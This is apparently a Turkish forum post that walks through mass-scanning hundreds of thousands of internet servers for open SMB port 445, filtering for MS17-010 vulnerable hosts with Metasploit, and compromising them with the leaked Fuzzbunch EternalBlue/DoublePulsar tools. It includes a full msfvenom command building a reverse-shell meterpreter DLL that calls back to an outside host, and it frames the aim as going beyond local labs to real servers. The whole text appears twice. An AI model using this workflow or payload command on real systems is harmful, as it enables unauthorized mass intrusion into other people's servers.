Bu yazımda İsin Teori kısmından bahsedecegim Uygulama Kısmını Belki Sonra Yazarım
evet biliyorsunuz ki bircok sızma olayı local agda denenıyor.bugun local agın biraz dısarasına cıkacagız.
Oncelıkle yapcagamız ısın mantıgından bahsedeyim
400-500 bin sunucuda 445.portunun acık olup olmadıgını kontrol edecegız nmap yardımı ile dns sorgu vb. seylerı kaldıracagız tabikide. olabilecek en hızlı taramayı yapacagız.
yaptıgımız tarama sonucunda Yaklaşık olarak;
* 100 bin sunucuda 100 adet 445. portu acık sunucu cıkıyor .
* 100 bin sunucu yaklasık 1.5-3 dakikada taranıyor .
* 100-200 adet smb portu acık sunucuda 1-2 adet ms17_010 zafiyeti olan makina cıkıyor .
evet cıkan cıktıları nmap ın -oN komutu sayesınde txt doyasına kaydedecegız.
txt doyasındaki ip adreslerini grep yardımı ile alt alta yazdıracagız ve > komutu ile baska bir txt dosyasına yazdıracagız
tamam artık ip adreslerini listeledik bundan sonra m.e.t.asploit yardımı ile -q ve -x parametrelerini kullanarak ms17_010 auxliary'sinin RHOSTS kısmına girecegiz .
tarama bittikten sonra cıktıyı baska bir txt dosyasını kaydedıp grep ile acıklı sunucuları listelecegiz
grep [+] [!] file.txt > file2.txt şeklinde
sonra file2.txt dosyasını "cat" ile ekrana yazdıracagız.
sonra file2.txt dosyasının icindeki ip bu sefer file3.txt ye aktaracagız ve m.e.t.asploitin smb sunucuları'da bilgi edinmek ıcın getırdıgı auxlıary'sinin "RHOSTS" Kısmına yonlendırecegız.
bunları yaparken "THREADS" lere baya bi abanacagız "THREADS" leri yuksek tutacagız burası onemli yoksa cok uzun surer .
tum bunları yaptıktan sonra bunlar ıcın bır scrıpt yazacagız (yazımı basit) ve yazdıgımız scrıpt gereken bilgileri grep ile toparlayıp bize cat ile sunacak .
bundan sonra Fuzzbunch kullanacagız(burdan Fuzzbunch ıcın Shadow Brokers'a tesekkurler) Eternalblue veya Doublepulsar kullanacagız
Eger Doublepulsar icin kullancak isek bir dll payloadı olusturmanız gerek
msfvenom -p windows/meterpreter/reverse_tcp LHOST=123.123.123.123 LPORT=1234 -f dll -o /root/shadowbroker/windows/storoge/deneme.dll seklınde
ve dll payloadını secerken Fuzzbunch'a
Z:\root\shadowbroker\windows\storoge\deneme.dll
seklınde yazmamız gerekıyor
Herneyse exploit kısmını ve fuzzbunch u kendınız arastırırsınız artık
grep [+] [!] file.txt
! !
! !
! !
Eternalblue Doublepulsar
burada" [+] "Eternalblue icin bulmak ıcın "[!] "doublepulsar için
Konunu sonuna Sevdigim bir sarkı ve aynı zamanda ip adresinden sunuculara sızan bir kisinin oldugu bir video koymak ıstedim
https://www.youtube.com/watch?list=UUaaW-O6h0JvTbOPeDdxXW8Q&v=G4EpfvWXUlY
evet biliyorsunuz ki bircok sızma olayı local agda denenıyor.bugun local agın biraz dısarasına cıkacagız.
Oncelıkle yapcagamız ısın mantıgından bahsedeyim
400-500 bin sunucuda 445.portunun acık olup olmadıgını kontrol edecegız nmap yardımı ile dns sorgu vb. seylerı kaldıracagız tabikide. olabilecek en hızlı taramayı yapacagız.
yaptıgımız tarama sonucunda Yaklaşık olarak;
* 100 bin sunucuda 100 adet 445. portu acık sunucu cıkıyor .
* 100 bin sunucu yaklasık 1.5-3 dakikada taranıyor .
* 100-200 adet smb portu acık sunucuda 1-2 adet ms17_010 zafiyeti olan makina cıkıyor .
evet cıkan cıktıları nmap ın -oN komutu sayesınde txt doyasına kaydedecegız.
txt doyasındaki ip adreslerini grep yardımı ile alt alta yazdıracagız ve > komutu ile baska bir txt dosyasına yazdıracagız
tamam artık ip adreslerini listeledik bundan sonra m.e.t.asploit yardımı ile -q ve -x parametrelerini kullanarak ms17_010 auxliary'sinin RHOSTS kısmına girecegiz .
tarama bittikten sonra cıktıyı baska bir txt dosyasını kaydedıp grep ile acıklı sunucuları listelecegiz
grep [+] [!] file.txt > file2.txt şeklinde
sonra file2.txt dosyasını "cat" ile ekrana yazdıracagız.
sonra file2.txt dosyasının icindeki ip bu sefer file3.txt ye aktaracagız ve m.e.t.asploitin smb sunucuları'da bilgi edinmek ıcın getırdıgı auxlıary'sinin "RHOSTS" Kısmına yonlendırecegız.
bunları yaparken "THREADS" lere baya bi abanacagız "THREADS" leri yuksek tutacagız burası onemli yoksa cok uzun surer .
tum bunları yaptıktan sonra bunlar ıcın bır scrıpt yazacagız (yazımı basit) ve yazdıgımız scrıpt gereken bilgileri grep ile toparlayıp bize cat ile sunacak .
bundan sonra Fuzzbunch kullanacagız(burdan Fuzzbunch ıcın Shadow Brokers'a tesekkurler) Eternalblue veya Doublepulsar kullanacagız
Eger Doublepulsar icin kullancak isek bir dll payloadı olusturmanız gerek
msfvenom -p windows/meterpreter/reverse_tcp LHOST=123.123.123.123 LPORT=1234 -f dll -o /root/shadowbroker/windows/storoge/deneme.dll seklınde
ve dll payloadını secerken Fuzzbunch'a
Z:\root\shadowbroker\windows\storoge\deneme.dll
seklınde yazmamız gerekıyor
Herneyse exploit kısmını ve fuzzbunch u kendınız arastırırsınız artık
grep [+] [!] file.txt
! !
! !
! !
Eternalblue Doublepulsar
burada" [+] "Eternalblue icin bulmak ıcın "[!] "doublepulsar için
Konunu sonuna Sevdigim bir sarkı ve aynı zamanda ip adresinden sunuculara sızan bir kisinin oldugu bir video koymak ıstedim
https://www.youtube.com/watch?list=UUaaW-O6h0JvTbOPeDdxXW8Q&v=G4EpfvWXUlY
Son düzenleme: